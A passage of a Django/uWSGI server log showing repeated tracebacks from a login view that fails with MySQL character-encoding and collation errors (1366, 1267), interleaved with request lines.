"/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 83/136] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:49 2021] POST /login/ => generated 209413 bytes in 124 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 84/137] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:49 2021] POST /login/ => generated 209413 bytes in 102 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 85/138] 219.228.146.146 () {40 vars in 889 bytes} [Thu Jan 14 07:43:49 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 245, in login + models.User.objects.create(uid=uid, password=pwd) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1") +[pid: 2069|app: 0|req: 86/139] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:49 2021] POST /login/ => generated 209413 bytes in 147 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 233, in login + if len(models.User.objects.filter(uid=uid, password=pwd)) != 0: + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") +[pid: 2069|app: 0|req: 87/140] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:50 2021] POST /login/ => generated 183350 bytes in 113 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 233, in login + if len(models.User.objects.filter(uid=uid, password=pwd)) != 0: + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") +[pid: 2069|app: 0|req: 88/141] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:43:50 2021] POST /login/ => generated 183350 bytes in 87 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 233, in login + if len(models.User.objects.filter(uid=uid, password=pwd)) != 0: + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File 